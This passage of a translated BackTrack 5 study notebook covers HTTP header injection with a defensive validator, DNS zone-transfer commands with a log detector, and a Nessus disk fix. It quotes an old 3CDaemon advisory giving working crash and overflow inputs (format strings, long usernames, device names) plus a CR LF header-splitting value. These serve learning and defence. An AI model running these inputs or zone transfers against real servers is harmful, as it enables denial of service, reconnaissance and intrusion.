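Added example, not part of the original notes.  The vulnerable function
copies a user-controlled value (a redirect target taken from the query
string) straight into a header.  A value containing CR LF ends the header
line early, so the remainder is read as further headers the application
never set, which is what makes the cache poisoning and XSS mentioned above
possible.  The hardened version refuses control characters in header
values, the same rule modern HTTP libraries enforce.
"""
from typing import Dict, Set, Tuple

# Constructed inputs: a normal redirect target and one carrying CR LF.
NORMAL_TARGET = "/home"
SPLITTING_TARGET = "/home\r\nX-Injected: 1"

# Headers the application itself emits; anything else on the wire was injected.
APP_HEADERS = {"Location", "Content-Length"}


class HeaderInjection(ValueError):
    """Raised when a header value would break out of its own line."""


def build_redirect_unsafe(location: str) -> bytes:
    """The defect: the header value is interpolated without validation."""
    response = (
        "HTTP/1.1 302 Found\r\n"
        f"Location: {location}\r\n"
        "Content-Length: 0\r\n"
        "\r\n"
    )
    return response.encode("latin-1")


def checked_header_value(value: str) -> str:
    """Reject anything that is not a legal RFC 7230 field-value character:
    CR, LF, NUL and the other control characters (HTAB is the one allowed)."""
    for ch in value:
        if (ord(ch) < 0x20 and ch != "\t") or ord(ch) == 0x7F:
            raise HeaderInjection(f"control character {ch!r} in header value")
    return value


def build_redirect_safe(location: str) -> bytes:
    """Same response, but the value is validated before it is emitted."""
    response = (
        "HTTP/1.1 302 Found\r\n"
        f"Location: {checked_header_value(location)}\r\n"
        "Content-Length: 0\r\n"
        "\r\n"
    )
    return response.encode("latin-1")


def parse_response(raw: bytes) -> Tuple[str, Dict[str, str], bytes]:
    """Read a response the way a simple proxy or cache does: status line,
    header lines up to the first blank line, then the body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip()] = value.strip()
    return lines[0], headers, body


def headers_not_set_by_app(raw: bytes) -> Set[str]:
    """Header names present on the wire that the application never set."""
    _, headers, _ = parse_response(raw)
    return set(headers) - APP_HEADERS


if __name__ == "__main__":
    print("unsafe build leaked:", headers_not_set_by_app(build_redirect_unsafe(SPLITTING_TARGET)))
    try:
        build_redirect_safe(SPLITTING_TARGET)
    except HeaderInjection as exc:
        print("safe build rejected input:", exc)
```

Rejecting the value is preferable to silently stripping the control characters: a stripped value may still be wrong, and an exception gives the application a place to log the attempt.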

zone transfer
A secondary DNS server requests zone data from the primary DNS server, and the primary copies its data to the secondary. If transfers are not restricted, internal host information may leak to an attacker. Whether zone transfer attempts are taking place can be determined by inspecting traffic on TCP port 53.
How it is done:
Windows:
nslookup
> server <DNS you are querying>
> set type=any
> ls -d <target>

Unix (nslookup is deprecated on Unix):
dig axfr @<DNS you are querying> <target>

http://security.stackexchange.com/questions/10452/dns-zone-transfer-attack
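Building on the note above that transfer attempts can be spotted on TCP port 53, here is an added detection example (written for these notes, not from the original document or the linked answer): it parses BIND-style query-log lines and reports AXFR/IXFR requests that did not come from an approved secondary. The log lines, the allow-list and the line layout are constructed for the example; the exact query-log format differs between BIND versions, so the regular expression is an assumption to adjust for your logs.

```python
"""Added example: flag zone-transfer requests from unapproved hosts in
BIND-style query logs. All log lines and addresses are constructed."""
import re
from ipaddress import ip_address, ip_network

# Constructed allow-list: the only hosts that should ever pull the zone.
APPROVED_SECONDARIES = [ip_network("192.0.2.20/32"), ip_network("10.0.5.0/24")]

# Assumed line layout: "... client <ip>#<port>: query: <name> IN <type> ..."
LINE_RE = re.compile(r"client (?P<src>[0-9a-fA-F.:]+)#\d+: query: (?P<zone>\S+) IN (?P<qtype>\S+)")


def parse_query(line: str):
    """Return (source_ip, zone, qtype) or None when the line is not a query record."""
    m = LINE_RE.search(line)
    if not m:
        return None
    return m.group("src"), m.group("zone"), m.group("qtype").upper()


def is_approved(src: str) -> bool:
    addr = ip_address(src)
    return any(addr in net for net in APPROVED_SECONDARIES)


def suspicious_transfers(lines):
    """Transfer requests (AXFR/IXFR) whose source is not an approved secondary."""
    hits = []
    for line in lines:
        parsed = parse_query(line)
        if parsed is None:
            continue
        src, zone, qtype = parsed
        if qtype in ("AXFR", "IXFR") and not is_approved(src):
            hits.append(parsed)
    return hits


# Constructed sample log: one legitimate AXFR, one unapproved AXFR, one IXFR from
# an approved range, and ordinary A/ANY queries that must not be flagged.
SAMPLE_LOG = [
    "09-Jan-2014 10:15:02.123 client 192.0.2.20#53411: query: example.com IN AXFR -E (192.0.2.1)",
    "09-Jan-2014 10:15:07.456 client 198.51.100.7#41002: query: example.com IN A -E (192.0.2.1)",
    "09-Jan-2014 10:15:09.789 client 198.51.100.7#41003: query: example.com IN AXFR -E (192.0.2.1)",
    "09-Jan-2014 10:15:11.001 client 10.0.5.3#55000: query: example.com IN IXFR -E (192.0.2.1)",
    "09-Jan-2014 10:15:12.002 client 203.0.113.9#60001: query: example.com IN ANY -E (192.0.2.1)",
]

if __name__ == "__main__":
    for src, zone, qtype in suspicious_transfers(SAMPLE_LOG):
        print(f"unapproved {qtype} of {zone} from {src}")
```

Detection complements, rather than replaces, restricting transfers on the server itself (in BIND, the allow-transfer option) so that only the listed secondaries can pull the zone.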

Other
Out of disk space
Hardly anything had been installed, yet this error appeared; presumably temporary files or log files.

Fix: check the disk space with df; it really is full.
root@bt:/# df -h
Filesystem            Size  Used Avail Use% Mounted on
/dev/sda1             7.5G  7.1G   22M 100% /
none                  493M  164K  493M   1% /dev
none                  501M     0  501M   0% /dev/shm
none                  501M   76K  501M   1% /var/run
none                  501M     0  501M   0% /var/lock
none                  501M     0  501M   0% /lib/init/rw
root@bt:/#

Remove unused packages (I did not install programs through apt-get, so running this freed no space):
root@bt:/# sudo apt-get autoclean
Reading package lists... Done
Building dependency tree
Reading state information... Done
After checking, there was nothing to delete, so the only option was to enlarge the disk. Shut down the VM -> VM settings -> Hard disk, and expand the disk as shown in the screenshots.

After rebooting into the system, the disk has been expanded successfully:
root@bt:~# fdisk -l

Disk /dev/sda: 16.1 GB, 16106127360 bytes
255 heads, 63 sectors/track, 1958 cylinders
Units = cylinders of 16065 * 512 = 8225280 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disk identifier: 0x00010475

   Device Boot      Start         End      Blocks   Id  System
/dev/sda1   *           1         994     7977984   83  Linux
Partition 1 does not end on cylinder boundary.
/dev/sda2             994        1045      407553    5  Extended
/dev/sda5             994        1045      407552   82  Linux swap / Solaris

But the system does not yet see the added space:
root@bt:~# df -h
Filesystem            Size  Used Avail Use% Mounted on
/dev/sda1             7.5G  7.0G  126M  99% /
none                  493M  164K  493M   1% /dev
none                  501M     0  501M   0% /dev/shm
none                  501M   72K  501M   1% /var/run
none                  501M     0  501M   0% /var/lock
none                  501M     0  501M   0% /lib/init/rw

Create a new partition

root@bt:~# fdisk /dev/sda

WARNING: DOS-compatible mode is deprecated. It's strongly recommended to
         switch off the mode (command 'c') and change display units to
         sectors (command 'u').

Command (m for help): ?
?: unknown command
Command action
   a   toggle a bootable flag
   b   edit bsd disklabel
   c   toggle the dos compatibility flag
   d   delete a partition
   l   list known partition types
   m   print this menu
   n   add a new partition
   o   create a new empty DOS partition table
   p   print the partition table
   q   quit without saving changes
   s   create a new empty Sun disklabel
   t   change a partition's system id
   u   change display/entry units
   v   verify the partition table
   w   write table to disk and exit
   x   extra functionality (experts only)

Command (m for help): n
Command action
   l   logical (5 or over)
   p   primary partition (1-4)
p
Partition number (1-4): 2
Partition 2 is already defined.  Delete it before re-adding it.

Command (m for help): n
Command action
   l   logical (5 or over)
   p   primary partition (1-4)
p
Partition number (1-4): 3
First cylinder (1045-1958, default 1045):
Using default value 1045
Last cylinder, +cylinders or +size{K,M,G} (1045-1958, default 1958):
Using default value 1958

Command (m for help): w
The partition table has been altered!

Calling ioctl() to re-read partition table.

WARNING: Re-reading the partition table failed with error 16: Device or resource busy.
The kernel still uses the old table. The new table will be used at
the next reboot or after you run partprobe(8) or kpartx(8)
Syncing disks.

Format the new partition
root@bt:~# mkfs -t ext3 /dev/sda3
mke2fs 1.41.11 (14-Mar-2010)
warning: 4 blocks unused.

Filesystem label=
OS type: Linux
Block size=4096 (log=2)
Fragment size=4096 (log=2)
Stride=0 blocks, Stripe width=0 blocks
459648 inodes, 1835008 blocks
91750 blocks (5.00%) reserved for the super user
First data block=0
Maximum filesystem blocks=1879048192
56 block groups
32768 blocks per group, 32768 fragments per group
8208 inodes per group
Superblock backups stored on blocks:
        32768, 98304, 163840, 229376, 294912, 819200, 884736, 1605632

Writing inode tables: done
Creating journal (32768 blocks): done
Writing superblocks and filesystem accounting information: done

This filesystem will be automatically checked every 35 mounts or
180 days, whichever comes first.  Use tune2fs -c or -i to override.

Mount the new partition
root@bt:~# cd /home
root@bt:/home# ls
root@bt:/home# mkdir work
root@bt:/home# ls
work
root@bt:/home# mount /dev/sda3 /home/work
root@bt:/home# df -h
Filesystem            Size  Used Avail Use% Mounted on
/dev/sda1             7.5G  7.0G  125M  99% /
none                  493M  168K  493M   1% /dev
none                  501M     0  501M   0% /dev/shm
none                  501M   72K  501M   1% /var/run
none                  501M     0  501M   0% /var/lock
none                  501M     0  501M   0% /lib/init/rw
/dev/sda3             6.9G  144M  6.4G   3% /home/work

Set up automatic mounting at boot
root@bt:/etc# vi /etc/fstab
Add the line:
/dev/sda3 /home/work ext3 defaults 0 1

After a reboot, the partition is mounted automatically:
root@bt:~# df -h
Filesystem            Size  Used Avail Use% Mounted on
/dev/sda1             7.5G  7.0G  125M  99% /
none                  493M  168K  493M   1% /dev
none                  501M     0  501M   0% /dev/shm
none                  501M   72K  501M   1% /var/run
none                  501M     0  501M   0% /var/lock
none                  501M     0  501M   0% /lib/init/rw
/dev/sda3             6.9G  144M  6.4G   3% /home/work

Move the program to the new directory with the mv command:
mv /opt/nessus/ /home/work/nessus
(this reported an error; ignore it for now)

Use a link so that the original location points at the new directory (screenshot)

Finally there is free space (screenshot)

After Nessus has been moved, its database must be re-initialized, which resolves the error reported above:
root@bt:/home/work/nessus/sbin# ./nessusd -R
This takes roughly an hour. Once initialization succeeds, reboot the system and the move is complete.

Appendix
HTTP response status codes

1xx (Provisional response): status codes that indicate a provisional response and require the requester to continue.
100 (Continue): The requester should continue with the request. The server returns this code to indicate that it has received the first part of the request and is waiting for the rest.
101 (Switching Protocols): The requester has asked the server to switch protocols; the server has acknowledged and is preparing to switch.

2xx (Success): the request was processed successfully.
200 (OK): The server processed the request successfully. Usually this means the server served the requested page.
201 (Created): The request succeeded and the server created a new resource.
202 (Accepted): The server accepted the request but has not yet processed it.
203 (Non-Authoritative Information): The server processed the request successfully, but the returned information may come from another source.
204 (No Content): The server processed the request successfully but returned no content.
205 (Reset Content): The server processed the request successfully but returned no content.
206 (Partial Content): The server successfully processed a partial GET request.

3xx (Redirection): further action is needed to complete the request. These codes are usually used for redirects.
300 (Multiple Choices): The server can perform several actions for the request. It may choose one based on the requester (user agent) or offer a list of actions for the requester to choose from.
301 (Moved Permanently): The requested page has moved permanently to a new location. When the server returns this response (to a GET or HEAD request), it automatically forwards the requester to the new location.
302 (Moved Temporarily): The server is currently responding with a page from a different location, but the requester should keep using the original location for future requests.
303 (See Other): The server returns this code when the requester should use a separate GET request to a different location to retrieve the response.
304 (Not Modified): The requested page has not been modified since the last request. When the server returns this response, it does not return the page content.
305 (Use Proxy): The requester can only access the requested page through a proxy. When the server returns this response, it also indicates that the requester should use a proxy.
307 (Temporary Redirect): The server is currently responding with a page from a different location, but the requester should keep using the original location for future requests.

4xx (Request error): these codes indicate that the request may contain an error that prevents the server from processing it.
400 (Bad Request): The server does not understand the syntax of the request.
401 (Unauthorized): The request requires authentication. The server may return this response for pages that require login.
403 (Forbidden): The server refuses the request.
404 (Not Found): The server cannot find the requested page.
405 (Method Not Allowed): The method specified in the request is disabled.
406 (Not Acceptable): The requested page cannot respond with the content characteristics requested.
407 (Proxy Authentication Required): Similar to 401 (Unauthorized), but specifies that the requester should authenticate with the proxy.
408 (Request Timeout): The server timed out while waiting for the request.
409 (Conflict): The server encountered a conflict while completing the request. The server must include information about the conflict in the response.
410 (Gone): The server returns this response if the requested resource has been permanently removed.
411 (Length Required): The server does not accept a request without a valid Content-Length header field.
412 (Precondition Failed): The server did not meet one of the preconditions the requester set in the request.
413 (Request Entity Too Large): The server cannot process the request because the request entity is too large for it to handle.
414 (Request-URI Too Long): The requested URI (usually a URL) is too long for the server to process.
415 (Unsupported Media Type): The format of the request is not supported by the requested page.
416 (Requested Range Not Satisfiable): The server returns this code if the page cannot supply the requested range.
417 (Expectation Failed): The server did not meet the requirements of the Expect request header field.

5xx (Server error): the server encountered an internal error while trying to process the request. These may be errors in the server itself rather than in the request.
500 (Internal Server Error): The server encountered an error and cannot complete the request.
501 (Not Implemented): The server does not have the functionality to complete the request. For example, it may return this code when it does not recognize the request method.
502 (Bad Gateway): The server, acting as a gateway or proxy, received an invalid response from the upstream server.
503 (Service Unavailable): The server is currently unavailable (because of overload or maintenance). Usually this is a temporary state.
504 (Gateway Timeout): The server, acting as a gateway or proxy, did not receive a timely request from the upstream server.
505 (HTTP Version Not Supported): The server does not support the HTTP protocol version used in the request.

Some common HTTP status codes:
200 - the server returned the page successfully
404 - the requested page does not exist
503 - service unavailable

Useful links
The following sites are ones I came across while learning and consider particularly valuable.

BackTrack official site
http://www.backtrack-linux.org

cvedetails
http://cvedetails.com/

Metasploit Unleashed
http://www.offensive-security.com/information-security-training/

Online MD5 lookup
http://cmd5.com/

owasp.org
https://www.owasp.org/index.php/Main_Page

infosec
http://resources.infosecinstitute.com

URL Decoder/Encoder
http://meyerweb.com/eric/tools/dencoder/

php charset encoder
http://yehg.net/encoding/

WooYun
http://www.wooyun.org/

Typical vulnerabilities
Below are the vulnerabilities I tested while learning.

3Com 3CDaemon 2.0 revision 10
For this vulnerability Metasploit has only an exploit module, with no corresponding payloads.

3Com 3CDaemon Multiple Vulnerabilities
By Sowhat
04.JAN.2005
http://secway.org/advisory/ad20041011.txt
[I.T.S] Security Research Team

Product Affected: 3Com 3CDaemon 2.0 revision 10
Vendor: www.3Com.com

(1) BACKGROUND
3CDaemon is a free popular TFTP, FTP, and Syslog daemon for Microsoft Windows platforms, developed by dan_gill@3Com.
For more information,
http://support.3com.com/software/utilities_for_windows_32_bit.htm
ftp://ftp.3com.com/pub/utilbin/win32/3cdv2r10.zip

3CDaemon is full of holes; ISS and Wang Ning <nwang (at) scn.com (dot) cn [email concealed]> have already reported some bugz about 3CDaemon (see:
http://xforce.iss.net/xforce/xfdb/8970
http://www.securityfocus.org/bid/11944 )
And I document some other well-known bugz here again :)

(2) Details
Remote exploitation of multiple vulnerabilities in the 3CDaemon allows attackers to execute arbitrary commands as the user running 3CDaemon (usually Administrator). Some of these vulnerabilities didn't need a valid username and password to login.

There are several vulnerabilities:

1. TFTP Reserved Device Name Denial of Service
D:\WINDOWS\system32>tftp -i 192.168.0.1 get prn
The 3CDaemon will be crashed with some msgs like
"Microsoft Visual C++ Runtime library"
"Runtime Error!"
"Program : C:\Program Files\3Com\3CDaemon\3CDaemon.exe "
"abnormal program termination".

2. FTP Username Format String vulnerability
H:\>ftp 192.168.0.1
Connected to 192.168.0.1.
220 3Com 3CDaemon FTP Server Version 2.0
User (192.168.0.1:(none)): %n
Connection closed by remote host.
OR:
H:\>ftp 192.168.0.1
Connected to 192.168.0.1.
220 3Com 3CDaemon FTP Server Version 2.0
User (192.168.0.1:(none)): %s
331 User name ok, need password
Password:[anythinghere]
530 Login access denied
Login failed.
ftp>
And then the 3CDaemon is dead.

3. FTP long Username Buffer overflow
D:\WINDOWS\system32>ftp 192.168.0.1
Connected to 192.168.0.1.
220 3Com 3CDaemon FTP Server Version 2.0
User (192.168.0.1:(none)):
501 Invalid or missing parameters
Login failed.
ftp> user AAA..[about 241 A here]...AAAAA
Connection closed by remote host.

4. Multiple FTP command long parameter Buffer overflow
Including: cd, send, ls, put, delete, rename, rmdir, literal, stat, CWD, and so on
(Maybe this is what ISS's Advisory is talking about)
ftp> cd AAA..[about 398 A here]...AAAAA
Connection closed by remote host.
ftp>
ftp> ls AAA..[about 247 A here]...AAAAA
200 PORT command successful.
Connection closed by remote host.
ftp> put 1.txt AAA..[about 247 A here]...AAAAA
200 PORT command successful.
532 Need account for storing files
Connection closed by remote host.
It seems that the length of the "A" is different for every command.

5. Multiple FTP command Format string
Including: cd, delete, rename, rmdir, literal, stat, CWD, and so on
230 User logged in
ftp> cd %n
Connection closed by remote host.
ftp>

6. Multiple FTP command Reserved Device Name Information Leak
Including cd, and so on
The following command will disclose the physical path of the 3cdaemon
ftp> cd aux
550 aux : C:/3cdaemon/aux is not a directory!
ftp> cd lpt1
550 lpt1 : C:/3cdaemon/lpt1 is not a directory!
and also, CD to an existing filename will disclose the physical path too.
ftp> cd toolz.rar
550 toolz.rar : C:/3cdaemon/toolz.rar is not a directory!
There are still some other boring bugz, but it's enough :>

(3) WORKAROUND
Workaround? No......

(4) Vendor Response
Since it seems that 3com didn't maintain 3CDaemon for a long long time, I didn't contact them :)

http://secway.org
Thanks to all the members of ITS Security Team

Afterword
When it comes to BT5 I am also a technical novice. Because I could not find fairly systematic study materials online when I started, I decided to record my entire learning process in order to organize the knowledge. During that process I found more and more how deep and broad the field of security is, so this document also includes other security topics. When typing commands, please mind the case: on Linux they are generally lowercase (the capitalized initial letters in this document are caused by Word's autocorrect feature).
